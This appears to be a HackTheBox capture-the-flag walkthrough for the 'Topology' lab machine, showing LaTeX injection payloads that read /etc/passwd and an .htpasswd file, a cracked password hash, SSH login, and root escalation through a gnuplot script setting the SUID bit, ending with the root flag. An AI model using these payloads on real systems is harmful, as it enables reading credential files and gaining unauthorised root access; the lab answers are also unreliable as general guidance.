HACKTHEBOX

Topology

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Creating Host

sudo vim etc/hosts/

add host as 10.10.11.217 topology.htb

Link: http://topology.htb/

Scanning

nmap -A -sV 10.10.11.217

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Visit http://topology.htb/

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Found LaTeX Equation Generator but couldn’t redirect so adding this host name in etc/hosts/

Had no idea about this website so searched Latex equation vulnerabilities and found Formula/CSV/Doc/LaTeX Injection - HackTricks.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Now I wanted to read files from Latex code generator

command: \input{/etc/passwd}

πŸ’‘ It's latex language issue , when I execute command its in "text" mode by adding $ it goes into "math mode" to calculate and execute equations

command: $\input{/etc/passwd}$

As we know /etc/passwd file is used to keep track of every registered user that has access to a system.

command: $\lstinputlisting{/etc/passwd}$

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Nothing much could be found here, let’s scan for some directories.

Scanning for Subdomains

Command: wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Add dev.topology.htb and stats.topology.htb to etc/hosts/

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Now we need to bypass this authenication, as we have seen this domain is running on Apache/2.4.41

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

πŸ”— Bypass Apache/2.4.41 401 Unauthorized: https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/

Command: $\lstinputlisting{/var/www/dev/.htpasswd}$

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Finally found a Hash as a .PNG file.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Hash: vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

Hash Cracking using John

command: john --wordlist=/usr/share/wordlists/rockyou.txt hash

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Output ?:calculus20

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

As see in our initial Nmap scan we have few SSH ports open.

Connect to SSH

command: ssh vdaisley@topology.htb

password: calculus20

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

For user flag

command: cat user.txt

Gaining Root access

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Nothing interesting found here, except a executable β€œpspy64”.

πŸ’‘ pspy is a command line tool designed to snoop on processes without need for root permissions.

command: ./pspy64

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More β†’

command: /opt/gnuplot

command: ls

Output: ls: cannot open directory '.': Permission denied

Create a file within gnuplot dir

command bash-5.0$ nano /opt/gnuplot/root.plt

Reverse Shell - root.plt must contain system β€œchmod u+s”

command: bash -p

-p  Turned on whenever the real and effective user ids do not match.
            Disables processing of the $ENV file and importing of shell
            functions.  Turning this option off causes the effective uid and
            gid to be set to the real uid and gid.

command: whoami β†’ root

Obtained the root access. Now, move on to root dir.

command: cd /root

ls

cat root.txt

Here is the root flag

Output: bb6b6780329a215d36126b6d6af62f1f